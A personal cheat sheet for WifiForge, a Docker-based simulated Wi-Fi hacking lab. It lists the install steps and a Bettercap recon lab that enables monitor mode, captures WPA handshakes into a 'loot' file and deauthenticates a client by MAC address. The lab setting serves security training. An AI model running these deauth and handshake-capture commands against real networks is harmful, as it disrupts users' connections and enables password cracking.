# WifiForge WifiForge is an [awesome tool](https://github.com/blackhillsinfosec/WifiForge) for learning how to hack wifi...without any wifi hardware! Here's my cheat sheet for getting started, which is pretty much lifted directly from the [installation docs](https://wififorge.github.io/Installation/Installation) ## Install Docker ``` sudo apt update -y sudo apt install docker.io -y ``` ## Install WifiForge ``` sudo docker pull redblackbird/wififorge:latest sudo docker run --privileged=true -it --env="DISPLAY" --env="QT_X11_NO_MITSHM=1" -v /tmp/.X11-unix:/tmp/.X11-unix:rw -v /sys/:/sys -v /lib/modules/:/lib/modules/ --name mininet-wifi --network=host --hostname mininet-wifi redblackbird/wififorge:latest /bin/bash ``` # Run it ``` cd /WifiForge/ service openvswitch-switch start sudo python3 WifiForge.py ``` ## Bettercap recon lab ### Enumerate wifi cards ``` iwconfig ``` ### Put wifi card in monitor mode ``` airmon-ng start Attacker-wlan0 ``` ### Start Bettercap ``` bettercap -iface wlan0mon ``` ### Set loot file ``` set wifi.handshakes.file ./handshakes ``` ### Enable recon ``` wifi.recon on ``` ### Show wifi network update, refresh every few seconds ``` set ticker.commands 'clear; wifi.show' ``` ### Enable ticker ``` ticker on ``` ### Filter recon to just channel 6 ``` wifi.recon.channel 6 ``` ### Deauth wifi ``` wifi.deauth 76:df:71:67:40:2b ``` ### Copy captured handshakes from docker to local hard drive ``` sudo docker cp mininet-wifi:/handshake ~/handshake ``` ## Starting WifiForge again later after exiting out ### Nuke old docker containers ``` sudo docker rm mininet-wifi ``` ### Check that they're gone: ``` sudo docker ps -a ``` ### Restart Docker ``` sudo docker run --privileged=true -it --env="DISPLAY" --env="QT_X11_NO_MITSHM=1" -v /tmp/.X11-unix:/tmp/.X11-unix:rw -v /sys/:/sys -v /lib/modules/:/lib/modules/ --name mininet-wifi --network=host --hostname mininet-wifi redblackbird/wififorge:latest /bin/bash ``` ### Restart WiFiForge ``` cd /WifiForge/ service openvswitch-switch start sudo python3 WifiForge.py ```